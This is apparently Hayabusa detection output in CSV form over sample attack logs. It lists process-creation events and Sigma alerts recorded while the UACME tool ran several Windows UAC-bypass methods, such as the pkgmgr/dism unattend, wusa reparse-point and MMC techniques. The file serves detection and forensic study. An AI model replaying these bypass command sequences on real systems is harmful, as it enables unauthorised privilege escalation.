2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  23  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""  :  Path: C:\Windows\System32\Dism.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  22  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  37  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  36  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  38  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe""   :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  39  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  41  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  43  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
